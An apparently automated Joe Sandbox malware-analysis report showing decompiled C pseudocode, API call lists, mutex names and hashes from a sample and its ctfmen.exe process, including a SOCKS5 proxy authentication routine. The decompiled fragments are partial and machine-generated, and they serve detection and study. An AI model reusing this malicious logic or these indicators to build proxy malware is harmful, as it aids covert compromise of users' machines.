Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: a1067839a208299eab76daf55394ac3ec8733fb75f3d0707a547c42b76d0ecf2
Instruction ID: f63abfe6bd6a6f6ba5da5a44fc92895626e452bfcf87627a9a73b7892de61845
Opcode Fuzzy Hash: a1067839a208299eab76daf55394ac3ec8733fb75f3d0707a547c42b76d0ecf2
Instruction Fuzzy Hash: 0021ECB59143048BCB10EF64D9816DEBBF0EF84314F40897FE584A3281EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 10001BBE Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E10001BBE(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, short* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v17;
				void* _v36;
				short* _v40;
				void* _t27;
				signed int _t28;
				void* _t33;
				void* _t38;
				signed int _t42;
				void* _t43;
				intOrPtr _t46;
				short* _t49;
				intOrPtr* _t51;

				_v16 = __ebx;
				_v12 = __esi;
				_v8 = __edi;
				_t46 = _a4;
				_t49 = _a8;
				_v17 = 0xff;
				_v36 = 2;
				_v40 = _t49;
				 *_t51 = _t46;
				_t28 = E1000128D(_t27);
				_t43 = 0;
				if(_t28 == 0) {
					L9:
					return _t43;
				}
				_t42 =  *(_t49 + 1) & 0x000000ff;
				_t43 = 0;
				if(((_t28 & 0xffffff00 |  *_t49 != 0x00000005 | 0 | _t42 == 0x00000000) & 0x00000001) != 0) {
					goto L9;
				}
				_v36 = _t42;
				_v40 = _t49;
				 *_t51 = _t46;
				_t33 = E1000128D(_t42);
				_t43 = 0;
				if(_t33 == 0) {
					goto L9;
				}
				while(1) {
					_t42 = _t42 - 1;
					if( *((char*)(_t49 + _t42)) == 2) {
						break;
					}
					if(_t42 > 0) {
						continue;
					}
					L7:
					 *_t49 = _v17 << 0x00000008 | 0x00000005;
					_v36 = 2;
					_v40 = _t49;
					 *_t51 = _t46;
					_t38 = E10001236(_v17 << 0x00000008 | 0x00000005);
					_t43 = 0;
					if(_t38 != 0) {
						_v40 = _t49;
						 *_t51 = _t46;
						_t43 = E10001A5B(_t42, _t46, _t49);
					}
					goto L9;
				}
				_v17 = 2;
				goto L7;
			}

0x10001bc4
0x10001bc7
0x10001bca
0x10001bcd
0x10001bd0
0x10001bd3
0x10001bd7
0x10001bdf
0x10001be3
0x10001be6
0x10001beb
0x10001bf2
0x10001c7d
0x10001c8b
0x10001c8b
0x10001bf8
0x10001c09
0x10001c10
0x00000000
0x00000000
0x10001c15
0x10001c19
0x10001c1d
0x10001c20
0x10001c25
0x10001c2c
0x00000000
0x00000000
0x10001c36
0x10001c36
0x10001c3f
0x00000000
0x00000000
0x10001c43
0x00000000
0x00000000
0x10001c45
0x10001c4f
0x10001c52
0x10001c5a
0x10001c5e
0x10001c61
0x10001c66
0x10001c6d
0x10001c6f
0x10001c73
0x10001c7b
0x10001c7b
0x00000000
0x10001c6d
0x10001c30
0x00000000

APIs

sread.SHERVANS ref: 10001BE6
sread.SHERVANS ref: 10001C20
swrite.SHERVANS ref: 10001C61
Socks5Auth.SHERVANS ref: 10001C76

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: sread$AuthSocks5swrite
String ID:
API String ID: 805060314-0
Opcode ID: 4e1afb2cb86adeb6528c9470966f2de77a63b8daad39af29b91a50e78bb70aaa
Instruction ID: 0b9e80be15c953b71f1d55b714f5562b534450c719e0e795439118d94a9aa7db
Opcode Fuzzy Hash: 4e1afb2cb86adeb6528c9470966f2de77a63b8daad39af29b91a50e78bb70aaa
Instruction Fuzzy Hash: BA219D70948754ABF710CF6881803AEFBE9EF84280F15C44AE8D897285D374DA42CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00404812 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040428B), ref: 0040484C
RegOpenKeyExA.ADVAPI32 ref: 0040487A
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004048B5
RegCloseKey.ADVAPI32 ref: 004048C5

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: 29f9e6147c9e0dbab374f9f7d1eee4296a4e52f03c6ec6fd140c1b1f9b0e3caf
Instruction ID: 49bf87151660670d78cfdeefb83c057e4f3b6f757f6147e457b2a6993822bbc7
Opcode Fuzzy Hash: 29f9e6147c9e0dbab374f9f7d1eee4296a4e52f03c6ec6fd140c1b1f9b0e3caf
Instruction Fuzzy Hash: 0D21C8F49043099FDB00EF69C18575EBBF4BB48348F40892EE998A7341E378DA488B52

Uniqueness

Uniqueness Score: -1.00%

Function 004067E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
networkCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004067E0(void* __ebx, signed int _a4) {
				void* _v8;
				char _v1036;
				signed int _v1040;
				intOrPtr _v1044;
				signed int _v1048;
				signed int _t13;
				signed int _t20;
				signed int _t22;
				void* _t23;
				signed int* _t24;
				intOrPtr* _t25;

				_t24 = _t23 - 0x414;
				_t20 =  &_v1036;
				_v1044 = 0x400;
				_v1048 = 0;
				 *_t24 = _t20;
				memset(__ebx, ??, ??);
				_v1040 = 0;
				_v1044 = 0x400;
				_v1048 = _t20;
				_t13 = _a4;
				 *_t24 = _t13;
				L004086B8();
				_t25 = _t24 - 0x10;
				_t22 = 0;
				if(_t13 + 1 > 1) {
					 *_t25 =  &_v1036;
					_t22 = (E00406856( &_v1036, _t20) & 0xffffff00 | _t17 - 0x00000190 < 0x00000000) & 0x000000ff;
				}
				return _t22;
			}

0x004067e4
0x004067ea
0x004067f0
0x004067f8
0x00406800
0x00406803
0x00406808
0x00406810
0x00406818
0x0040681c
0x0040681f
0x00406822
0x00406827
0x0040682b
0x00406833
0x0040683b
0x0040684b
0x0040684b
0x00406854

APIs

memset.MSVCRT ref: 00406803
recv.WS2_32 ref: 00406822

Part of subcall function 00406856: lstrlen.KERNEL32(?,?,?), ref: 0040686A
Part of subcall function 00406856: sscanf.MSVCRT ref: 0040688E

Strings

fc@, xrefs: 00406850

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrlenmemsetrecvsscanf
String ID: fc@
API String ID: 2556557004-2333546356
Opcode ID: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
Instruction ID: 7b1cb7ca667fa739690624300255a696f657d489af5130fe59f4ce6b6cdf8f5c
Opcode Fuzzy Hash: c1133dbf17f94d7c7e6c6e6ca5dd0c921707f1a6a51cd10e35ba8147b46d26d8
Instruction Fuzzy Hash: CBF01DB05043049EDB00FF25C58535EBBE4AB44348F51886DE6C8A7382D638D5898B56

Uniqueness

Uniqueness Score: -1.00%

Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00404059
GetLastError.KERNEL32 ref: 00404061

Strings

k_fbpxf5nna, xrefs: 00404033

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: k_fbpxf5nna
API String ID: 1925916568-3032876681
Opcode ID: 9a88b48d1ad107bc964547b3910128f81a6eaee6bb5813ff57ad5a3f8fd565ef
Instruction ID: b44495afc4b5e1c155c3d7f26a4bf6281c5b98a28f183e2cb1f81a9367dbc24a
Opcode Fuzzy Hash: 9a88b48d1ad107bc964547b3910128f81a6eaee6bb5813ff57ad5a3f8fd565ef
Instruction Fuzzy Hash: 17E04FB0418308DAC700BF71C1C664DBEE4AB80348F40893EE888622C2C778958C8727

Uniqueness

Uniqueness Score: -1.00%

Function 00403E2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00403E5B
GetLastError.KERNEL32 ref: 00403E63

Strings

IHYanFuibyan, xrefs: 00403E35

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: IHYanFuibyan
API String ID: 1925916568-2233043627
Opcode ID: 4d0d80ee3a61e30fea3e63c13358dfb84c2fbac065cd1307cf50ef5234048b85
Instruction ID: b226eb3715ba9fc3d7238d88576273fb4163caaa6f42e8cd02b01324a8811274
Opcode Fuzzy Hash: 4d0d80ee3a61e30fea3e63c13358dfb84c2fbac065cd1307cf50ef5234048b85
Instruction Fuzzy Hash: 30E04FB0408308DACB00BF71C1C564DBEE4AB40388F40853EE888622C2C778954C8727

Uniqueness

Uniqueness Score: -1.00%

Function 0040B460 Relevance: 5.1, APIs: 4, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E0040B460(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, int _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v24;
				void* _t20;
				long _t24;
				void* _t25;
				int _t28;
				intOrPtr _t38;
				int _t40;
				intOrPtr* _t49;
				long* _t50;

				_t43 = __esi;
				_t32 = __ebx;
				_v8 = __edi;
				_t40 = _a4;
				_v16 = __ebx;
				_v12 = __esi;
				_t38 =  *0x418284;
				if(_t38 == 0) {
					E0040B0E0(_t20);
					_t38 =  *0x418284;
					if( *((intOrPtr*)(_t38 + 0x30)) >= 0) {
						goto L2;
					} else {
						goto L7;
					}
				} else {
					if( *((intOrPtr*)(_t38 + 0x30)) < 0) {
						L7:
						E0040B3B0(_t32, _t43);
						_t38 =  *0x418284;
						if( *((intOrPtr*)(_t38 + 0x30)) == 0) {
							goto L3;
						} else {
							goto L9;
						}
					} else {
						L2:
						if( *((intOrPtr*)(_t38 + 0x30)) != 0) {
							L9:
							_t24 = GetLastError();
							 *_t49 =  *((intOrPtr*)(_t38 + 0x2c));
							_t25 = TlsGetValue(??);
							_t50 = _t49 - 4;
							 *_t50 = _t24;
							SetLastError(??);
							 *_t40 = _t25;
							_v24 = _t40;
							 *((intOrPtr*)(_t50 - 4)) =  *((intOrPtr*)( *0x418284 + 0x2c));
							_t28 = TlsSetValue(??, ??);
							if(_t28 == 0) {
								goto __ecx;
							}
						} else {
							L3:
							_t28 =  *(_t38 + 0x28);
							 *_t40 = _t28;
							 *(_t38 + 0x28) = _t40;
						}
					}
				}
				return _t28;
			}

0x0040b460
0x0040b460
0x0040b466
0x0040b469
0x0040b46c
0x0040b46f
0x0040b472
0x0040b47a
0x0040b4a0
0x0040b4a5
0x0040b4b0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b47c
0x0040b481
0x0040b4c0
0x0040b4c0
0x0040b4c5
0x0040b4d0
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b483
0x0040b483
0x0040b488
0x0040b4e0
0x0040b4e3
0x0040b4e9
0x0040b4ee
0x0040b4f4
0x0040b4f9
0x0040b4fc
0x0040b502
0x0040b50f
0x0040b513
0x0040b516
0x0040b521
0x0040b539
0x0040b539
0x0040b48a
0x0040b48a
0x0040b48a
0x0040b48d
0x0040b48f
0x0040b48f
0x0040b488
0x0040b481
0x0040b49e

APIs

GetLastError.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4E3
TlsGetValue.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4EE
SetLastError.KERNEL32(?,?,?,?,?,?,00405F1A), ref: 0040B4FC
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00405F1A), ref: 0040B516

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: ErrorLastValue
String ID:
API String ID: 1151882462-0
Opcode ID: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
Instruction ID: 439973a8ce157f22f3a963889ba98c70b340b09c43d7307190215458f466d12f
Opcode Fuzzy Hash: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
Instruction Fuzzy Hash: 8B210375A0060A9FCB40DF69DA8469ABBF4FF48310F1081AADC44A7352E734BE51CBC9

Uniqueness

Uniqueness Score: -1.00%

Function 00402B1D Relevance: 5.1, APIs: 4, Instructions: 57stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402B31

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402B59
lstrcat.KERNEL32 ref: 00402B81
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402BA3

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 2c7b681fe86cc2fd1af3aa736b3d656723dcda11dd27d62708b8b77b6b1c1b4c
Instruction ID: 03b09b6922a9c514b299c22ddce90b04ecaf30bc7003352be57799a9fe594460
Opcode Fuzzy Hash: 2c7b681fe86cc2fd1af3aa736b3d656723dcda11dd27d62708b8b77b6b1c1b4c
Instruction Fuzzy Hash: C121FCB59143148BCB10EF64D9816DEBBF4BB84314F40857FE584A3281EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402936 Relevance: 5.1, APIs: 4, Instructions: 56stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 0040294A

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402972
lstrcat.KERNEL32 ref: 0040299A
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004029BC

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: a53f60471630b529b5b3fa49e027026b6c5687552c409762689948fa5b30f580
Instruction ID: 058901da40b0e2efb01319e0cab41814326d79342e400853ca70bd999cd91e9a
Opcode Fuzzy Hash: a53f60471630b529b5b3fa49e027026b6c5687552c409762689948fa5b30f580
Instruction Fuzzy Hash: AE21EE759143148BC710EF64D98169EBBF4FB84314F00897FE5C5A3241EB389698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402D1F Relevance: 5.1, APIs: 4, Instructions: 55stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402D33
lstrcat.KERNEL32 ref: 00402D4D

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 00402D75
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 00402D97

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: a5e0d163f18fc207e3c7efa7da69fe8f01bfacc653d33c2322edad23d5ce2f0b
Instruction ID: c94e486dd441945c80f89e6855cf6e362e59878be9d52d1e169f04df5a17e1bb
Opcode Fuzzy Hash: a5e0d163f18fc207e3c7efa7da69fe8f01bfacc653d33c2322edad23d5ce2f0b
Instruction Fuzzy Hash: 8521ECB69143148BCB10EF64D9816DEBBF4BB84314F40857FE589A3241EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0040285D Relevance: 5.1, APIs: 4, Instructions: 54stringsleepCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32 ref: 00402871
lstrcat.KERNEL32 ref: 0040288B

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

lstrcat.KERNEL32 ref: 004028B3
Sleep.KERNEL32 ref: 00402EC5
lstrcat.KERNEL32 ref: 004028D5

Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
String ID:
API String ID: 1562643418-0
Opcode ID: 55e289c392c43dc11c6b29da9f1cba6e1b33f9d9a4985b1c99fcb906303650f7
Instruction ID: a2a94c62469e04ea526b3170561a4d1959144f6524308fe89c3ba5c1d6912741
Opcode Fuzzy Hash: 55e289c392c43dc11c6b29da9f1cba6e1b33f9d9a4985b1c99fcb906303650f7
Instruction Fuzzy Hash: 2F21ED769043048BC710EF64D9815CEBBF4FB84314F40857FE985A3241EB349698CF96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ctfmen.exePID: 2740, Parent PID: 3996COMMON

Execution Graph

Execution Coverage:	13.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	94
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401150 Relevance: 13.6, APIs: 9, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401150() {
				char _v12;
				char _v16;
				char* _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _t23;
				intOrPtr* _t25;
				void* _t35;
				void* _t36;
				intOrPtr _t38;
				void* _t39;
				signed int _t40;

				_v44 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t40 = _t39 - 4;
				E004016C0(E004015C0(_t35, _t36));
				_v12 = 0;
				_v32 =  &_v12;
				 *_t40 = 0x404004;
				_v36 =  *0x402000;
				_v40 =  &_v16;
				_v44 = 0x404000;
				L00401A38();
				_t23 =  *0x404008;
				if(_t23 == 0) {
					L6:
					L00401A28();
					 *_t23 =  *0x402004;
					E00401590(_t23);
					_t40 = _t40 & 0xfffffff0;
					_t25 = E00401570();
					L00401A18();
					_v40 =  *_t25;
					_v44 =  *0x404000;
					 *_t40 =  *0x404004; // executed
					_t23 = E00401410(_t35); // executed
					L00401A10();
					 *_t40 = _t23; // executed
					ExitProcess(??); // executed
					L7:
					_v40 = _t23;
					_t23 =  *((intOrPtr*)( *0x405110 + 0x10));
					_v44 = _t23;
					L00401A30();
					_t38 =  *0x405110;
					L2:
					if(_t38 != 0xffffffe0) {
						_v40 =  *0x404008;
						_t23 =  *((intOrPtr*)( *0x405110 + 0x30));
						_v44 = _t23;
						L00401A30();
						_t38 =  *0x405110;
					}
					if(_t38 != 0xffffffc0) {
						_v40 =  *0x404008;
						_t23 =  *((intOrPtr*)( *0x405110 + 0x50));
						_v44 = _t23;
						L00401A30();
					}
					goto L6;
				}
				 *0x402004 = _t23;
				_t38 =  *0x405110;
				if(_t38 != 0) {
					goto L7;
				}
				goto L2;
			}

0x00401157
0x0040115e
0x00401163
0x0040116b
0x00401170
0x0040117a
0x00401183
0x0040118a
0x00401191
0x0040119a
0x0040119e
0x004011a3
0x004011aa
0x00401210
0x00401210
0x0040121b
0x0040121d
0x00401222
0x00401225
0x0040122a
0x00401231
0x0040123a
0x00401243
0x00401246
0x0040124d
0x00401252
0x00401255
0x00401260
0x00401260
0x00401269
0x0040126c
0x0040126f
0x00401274
0x004011bf
0x004011c2
0x004011c9
0x004011d2
0x004011d5
0x004011d8
0x004011dd
0x004011dd
0x004011e6
0x004011ed
0x004011f6
0x004011f9
0x004011fc
0x004011fc
0x00000000
0x004011e6
0x004011ac
0x004011b1
0x004011b9
0x00000000
0x00000000
0x00000000

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 0040115E
__getmainargs.MSVCRT ref: 0040119E
_setmode.MSVCRT ref: 004011D8
_setmode.MSVCRT ref: 004011FC
__p__fmode.MSVCRT ref: 00401210
__p__environ.MSVCRT ref: 0040122A
_cexit.MSVCRT ref: 0040124D
ExitProcess.KERNEL32 ref: 00401255
_setmode.MSVCRT ref: 0040126F

Memory Dump Source

Source File: 00000004.00000002.273253407.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.273184644.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273381026.0000000000403000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273389736.0000000000405000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.273402573.0000000000407000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ctfmen.jbxd

Similarity

